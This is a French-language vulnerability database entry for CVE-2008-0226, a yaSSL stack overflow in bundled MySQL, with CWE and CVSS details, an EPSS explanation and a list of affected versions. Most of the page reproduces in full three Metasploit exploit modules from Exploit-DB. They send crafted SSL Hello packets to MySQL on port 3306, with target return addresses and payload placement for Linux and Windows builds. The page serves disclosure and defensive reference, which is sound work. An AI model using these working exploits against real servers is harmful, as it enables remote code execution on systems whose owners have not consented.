Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 9953
Date de publication : 2008-01-03 23h00 +00:00
Auteur : MC
EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
implementation bundled with MySQL <= 6.0. By sending a specially crafted
Hello packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195' ],
[ 'BID', '27140' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 100,
'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'linux',
'Targets' =>
[
[ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 4 2008'))
register_options([ Opt::RPORT(3306)], self.class)
end
def exploit
connect
sock.get_once
req_uno = [0x01000020].pack('V')
req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V')
req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3965)
req_dos << [target.ret].pack('V') + payload.encoded
req_dos << rand_text_alphanumeric(1024)
print_status("Trying target #{target.name}...")
sock.put(req_uno)
sock.put(req_dos)
handler
disconnect
end
end
Exploit Database EDB-ID : 16849
Date de publication : 2010-05-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: mysql_yassl_hello.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)
implementation bundled with MySQL <= 6.0. By sending a specially crafted
Hello packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195' ],
[ 'BID', '27140' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 100,
'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'linux',
'Targets' =>
[
[ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 4 2008'))
register_options(
[
Opt::RPORT(3306)
], self.class)
end
def exploit
connect
sock.get_once
req_uno = [0x01000020].pack('V')
req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V')
req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3965)
req_dos << [target.ret].pack('V') + payload.encoded
req_dos << rand_text_alphanumeric(1024)
print_status("Trying target #{target.name}...")
sock.put(req_uno)
sock.put(req_dos)
handler
disconnect
end
end
Exploit Database EDB-ID : 16701
Date de publication : 2010-05-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: mysql_yassl_hello.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)
implementation bundled with MySQL <= 6.0. By sending a specially crafted
Hello packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
[ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 4 2008'))
register_options([ Opt::RPORT(3306) ], self)
end
def exploit
connect
sock.get_once
req_uno = [0x01000020].pack('V')
req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V')
req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length)
req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V')
req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024)
print_status("Trying target #{target.name}...")
sock.put(req_uno)
sock.put(req_dos)
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Yassl>>Yassl >> Version To (including) 1.7.5
Configuraton 0
Mysql>>Mysql >> Version 5.0.0
Mysql>>Mysql >> Version 5.0.1
Mysql>>Mysql >> Version 5.0.2
Mysql>>Mysql >> Version 5.0.3
Mysql>>Mysql >> Version 5.0.4
Mysql>>Mysql >> Version 5.0.5
Mysql>>Mysql >> Version 5.0.10
Mysql>>Mysql >> Version 5.0.15
Mysql>>Mysql >> Version 5.0.16
Mysql>>Mysql >> Version 5.0.17
Mysql>>Mysql >> Version 5.0.20
Mysql>>Mysql >> Version 5.0.24
Mysql>>Mysql >> Version 5.0.30
Mysql>>Mysql >> Version 5.0.36
Mysql>>Mysql >> Version 5.0.44
Mysql>>Mysql >> Version 5.0.54
Mysql>>Mysql >> Version 5.0.56
Mysql>>Mysql >> Version 5.0.60
Mysql>>Mysql >> Version 5.0.66
Mysql>>Mysql >> Version 5.1.5
Oracle>>Mysql >> Version 5.0.23
Oracle>>Mysql >> Version 5.0.25
Oracle>>Mysql >> Version 5.0.26
Oracle>>Mysql >> Version 5.0.28
Oracle>>Mysql >> Version 5.0.30
Oracle>>Mysql >> Version 5.0.32
Oracle>>Mysql >> Version 5.0.34
Oracle>>Mysql >> Version 5.0.36
Oracle>>Mysql >> Version 5.0.38
Oracle>>Mysql >> Version 5.0.40
Oracle>>Mysql >> Version 5.0.41
Oracle>>Mysql >> Version 5.0.42
Oracle>>Mysql >> Version 5.0.44
Oracle>>Mysql >> Version 5.0.45
Oracle>>Mysql >> Version 5.0.46
Oracle>>Mysql >> Version 5.0.48
Oracle>>Mysql >> Version 5.0.50
Oracle>>Mysql >> Version 5.0.50
Oracle>>Mysql >> Version 5.0.51
Oracle>>Mysql >> Version 5.0.52
Oracle>>Mysql >> Version 5.0.56
Oracle>>Mysql >> Version 5.0.58
Oracle>>Mysql >> Version 5.0.60
Oracle>>Mysql >> Version 5.0.62
Oracle>>Mysql >> Version 5.0.64
Oracle>>Mysql >> Version 5.0.66
Oracle>>Mysql >> Version 5.1
Oracle>>Mysql >> Version 5.1.1
Oracle>>Mysql >> Version 5.1.2
Oracle>>Mysql >> Version 5.1.3
Oracle>>Mysql >> Version 5.1.4
Oracle>>Mysql >> Version 5.1.6
Oracle>>Mysql >> Version 5.1.7
Oracle>>Mysql >> Version 5.1.8
Oracle>>Mysql >> Version 5.1.9
Oracle>>Mysql >> Version 5.1.10
Oracle>>Mysql >> Version 5.1.11
Oracle>>Mysql >> Version 5.1.12
Oracle>>Mysql >> Version 5.1.13
Oracle>>Mysql >> Version 5.1.14
Oracle>>Mysql >> Version 5.1.15
Oracle>>Mysql >> Version 5.1.16
Oracle>>Mysql >> Version 5.1.17
Oracle>>Mysql >> Version 5.1.18
Oracle>>Mysql >> Version 5.1.19
Oracle>>Mysql >> Version 5.1.20
Oracle>>Mysql >> Version 5.1.21
Oracle>>Mysql >> Version 5.1.22
Configuraton 0
Apple>>Mac_os_x >> Version 10.5.4
Configuraton 0
Debian>>Debian_linux >> Version 5.0
Configuraton 0
Canonical>>Ubuntu_linux >> Version 6.06
Canonical>>Ubuntu_linux >> Version 6.10
Canonical>>Ubuntu_linux >> Version 7.04
Canonical>>Ubuntu_linux >> Version 7.10
Références